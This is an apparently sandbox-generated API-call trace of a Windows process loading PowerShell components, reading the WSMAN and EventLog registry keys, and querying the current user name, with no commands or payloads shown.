	[0169.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.935] VirtualQuery (in: lpAddress=0x18b990, lpBuffer=0x18c850, dwLength=0x30 | out: lpBuffer=0x18c850*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.936] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0x1914f377, Data2=0x34ed, Data3=0x4630, Data4=([0]=0x94, [1]=0x97, [2]=0x4d, [3]=0x3a, [4]=0xb4, [5]=0xb6, [6]=0xa9, [7]=0x96))) returned 0x0
	[0176.937] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0x874b7ef4, Data2=0xe533, Data3=0x4058, Data4=([0]=0x97, [1]=0x5, [2]=0xda, [3]=0x84, [4]=0x6b, [5]=0x86, [6]=0x79, [7]=0x44))) returned 0x0
	[0176.937] VirtualQuery (in: lpAddress=0x18bb40, lpBuffer=0x18ca00, dwLength=0x30 | out: lpBuffer=0x18ca00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.938] VirtualQuery (in: lpAddress=0x18bb40, lpBuffer=0x18ca00, dwLength=0x30 | out: lpBuffer=0x18ca00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.939] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0xedde8593, Data2=0xf55d, Data3=0x477b, Data4=([0]=0xa4, [1]=0x80, [2]=0x51, [3]=0x29, [4]=0xa0, [5]=0x44, [6]=0x94, [7]=0xbb))) returned 0x0
	[0176.942] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0xfe1525d2, Data2=0x83fc, Data3=0x41ad, Data4=([0]=0xba, [1]=0x93, [2]=0x86, [3]=0xbb, [4]=0xa5, [5]=0xfa, [6]=0xbc, [7]=0x23))) returned 0x0
	[0176.942] VirtualQuery (in: lpAddress=0x18bd90, lpBuffer=0x18cc50, dwLength=0x30 | out: lpBuffer=0x18cc50*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.945] VirtualQuery (in: lpAddress=0x18b400, lpBuffer=0x18c2c0, dwLength=0x30 | out: lpBuffer=0x18c2c0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.494] VirtualQuery (in: lpAddress=0x18b130, lpBuffer=0x18bff0, dwLength=0x30 | out: lpBuffer=0x18bff0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.495] VirtualQuery (in: lpAddress=0x18b1c0, lpBuffer=0x18c080, dwLength=0x30 | out: lpBuffer=0x18c080*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.496] VirtualQuery (in: lpAddress=0x18b940, lpBuffer=0x18c800, dwLength=0x30 | out: lpBuffer=0x18c800*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.497] VirtualQuery (in: lpAddress=0x18b940, lpBuffer=0x18c800, dwLength=0x30 | out: lpBuffer=0x18c800*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0190.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0190.499] VirtualQuery (in: lpAddress=0x18b940, lpBuffer=0x18c800, dwLength=0x30 | out: lpBuffer=0x18c800*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0197.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0197.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0200.659] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0200.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.659] CoTaskMemFree (pv=0x2358c0) 
	[0200.660] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0200.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.660] CoTaskMemFree (pv=0x2358c0) 
	[0200.662] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0200.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.662] CoTaskMemFree (pv=0x2358c0) 
	[0200.663] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0200.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.663] CoTaskMemFree (pv=0x2358c0) 
	[0200.673] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0200.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.673] CoTaskMemFree (pv=0x2358c0) 
	[0200.678] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0200.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.678] CoTaskMemFree (pv=0x2358c0) 
	[0200.679] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0200.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.679] CoTaskMemFree (pv=0x2358c0) 
	[0200.897] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d108 | out: phkResult=0x18d108*=0x320) returned 0x0
	[0200.902] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d00c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d008, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d00c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d008*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.902] CoTaskMemFree (pv=0x0) 
	[0200.903] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0200.903] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x2189c0, lpcchValueName=0x18d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x18d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.903] CoTaskMemFree (pv=0x2189c0) 
	[0200.903] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0200.903] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x2189c0, lpcchValueName=0x18d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x18d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.904] CoTaskMemFree (pv=0x2189c0) 
	[0200.904] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0200.904] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x2189c0, lpcchValueName=0x18d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x18d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.904] CoTaskMemFree (pv=0x2189c0) 
	[0200.905] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d09c, lpData=0x0, lpcbData=0x18d098*=0x0 | out: lpType=0x18d09c*=0x1, lpData=0x0, lpcbData=0x18d098*=0x8) returned 0x0
	[0200.905] CoTaskMemAlloc (cb=0xc) returned 0x1b91d630
	[0200.906] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d06c, lpData=0x1b91d630, lpcbData=0x18d068*=0x8 | out: lpType=0x18d06c*=0x1, lpData="2.0", lpcbData=0x18d068*=0x8) returned 0x0
	[0203.464] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d058 | out: phkResult=0x18d058*=0x328) returned 0x0
	[0203.465] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18cf5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18cf58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18cf5c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18cf58*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.465] CoTaskMemFree (pv=0x0) 
	[0203.465] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.465] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x2189c0, lpcchValueName=0x18d008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x18d008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.465] CoTaskMemFree (pv=0x2189c0) 
	[0203.465] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.465] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x2189c0, lpcchValueName=0x18d008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x18d008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.465] CoTaskMemFree (pv=0x2189c0) 
	[0203.465] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.465] RegEnumValueW (in: hKey=0x328, dwIndex=0x2, lpValueName=0x2189c0, lpcchValueName=0x18d008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x18d008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.465] CoTaskMemFree (pv=0x2189c0) 
	[0203.465] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18cfec, lpData=0x0, lpcbData=0x18cfe8*=0x0 | out: lpType=0x18cfec*=0x1, lpData=0x0, lpcbData=0x18cfe8*=0x8) returned 0x0
	[0203.465] CoTaskMemAlloc (cb=0xc) returned 0x1b91d550
	[0203.465] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18cfbc, lpData=0x1b91d550, lpcbData=0x18cfb8*=0x8 | out: lpType=0x18cfbc*=0x1, lpData="2.0", lpcbData=0x18cfb8*=0x8) returned 0x0
	[0203.465] CoTaskMemFree (pv=0x1b91d550) 
	[0203.466] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0203.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.466] CoTaskMemFree (pv=0x2358c0) 
	[0203.471] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0203.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.471] CoTaskMemFree (pv=0x2358c0) 
	[0203.804] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d088 | out: phkResult=0x18d088*=0x330) returned 0x0
	[0203.812] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18cffc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18cff8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18cffc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18cff8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.812] CoTaskMemFree (pv=0x0) 
	[0203.813] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.813] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x2189c0, lpcchName=0x18d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.814] CoTaskMemFree (pv=0x2189c0) 
	[0203.814] CoTaskMemFree (pv=0x0) 
	[0203.814] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.814] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x2189c0, lpcchName=0x18d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.816] CoTaskMemFree (pv=0x2189c0) 
	[0203.816] CoTaskMemFree (pv=0x0) 
	[0203.816] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.816] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x2189c0, lpcchName=0x18d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.817] CoTaskMemFree (pv=0x2189c0) 
	[0203.817] CoTaskMemFree (pv=0x0) 
	[0203.817] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.817] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x2189c0, lpcchName=0x18d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.818] CoTaskMemFree (pv=0x2189c0) 
	[0203.818] CoTaskMemFree (pv=0x0) 
	[0203.818] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.818] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x2189c0, lpcchName=0x18d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.820] CoTaskMemFree (pv=0x2189c0) 
	[0203.820] CoTaskMemFree (pv=0x0) 
	[0203.820] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.820] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x2189c0, lpcchName=0x18d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.821] CoTaskMemFree (pv=0x2189c0) 
	[0203.821] CoTaskMemFree (pv=0x0) 
	[0203.821] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.821] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x2189c0, lpcchName=0x18d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.822] CoTaskMemFree (pv=0x2189c0) 
	[0203.822] CoTaskMemFree (pv=0x0) 
	[0203.822] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.823] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x2189c0, lpcchName=0x18d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.824] CoTaskMemFree (pv=0x2189c0) 
	[0203.824] CoTaskMemFree (pv=0x0) 
	[0203.824] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0203.824] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x2189c0, lpcchName=0x18d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.825] CoTaskMemFree (pv=0x2189c0) 
	[0203.825] CoTaskMemFree (pv=0x0) 
	[0203.825] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x308) returned 0x0
	[0203.825] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x0) returned 0x2
	[0203.825] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x30c) returned 0x0
	[0203.825] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x0) returned 0x2
	[0203.826] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x310) returned 0x0
	[0203.826] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x0) returned 0x2
	[0203.826] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x324) returned 0x0
	[0203.826] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x0) returned 0x2
	[0203.826] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x160) returned 0x0
	[0203.826] RegOpenKeyExW (in: hKey=0x160, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x0) returned 0x2
	[0203.826] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x334) returned 0x0
	[0203.826] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x0) returned 0x2
	[0203.826] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d0e8 | out: phkResult=0x18d0e8*=0x0) returned 0x5
	[0204.409] CoTaskMemAlloc (cb=0x804) returned 0x1b923140
	[0204.409] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b923140, nSize=0x18d2f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x18d2f8) returned 0x1
	[0204.993] CoTaskMemFree (pv=0x1b923140) 
	[0204.994] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0204.994] GetUserNameW (in: lpBuffer=0x2189c0, pcbBuffer=0x18d338 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18d338) returned 1
	[0204.995] CoTaskMemFree (pv=0x2189c0) 
	[0211.394] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d038 | out: phkResult=0x18d038*=0x344) returned 0x0
